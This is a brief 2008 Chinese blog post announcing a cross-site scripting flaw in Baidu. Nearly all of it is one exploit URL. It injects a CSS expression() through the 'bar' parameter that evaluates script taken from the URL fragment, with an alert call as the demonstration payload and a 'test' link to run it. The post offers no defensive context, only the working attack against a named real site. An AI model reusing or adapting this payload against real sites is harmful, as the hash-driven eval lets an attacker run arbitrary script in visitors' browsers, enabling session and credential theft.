百度最新跨站漏洞

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%27www.safe3.cn%27%29
测试地址:运行

posted on 2008-07-10 13:55 Safe3 阅读(54) 评论(0) 编辑 收藏

(评论功能已被博主禁用)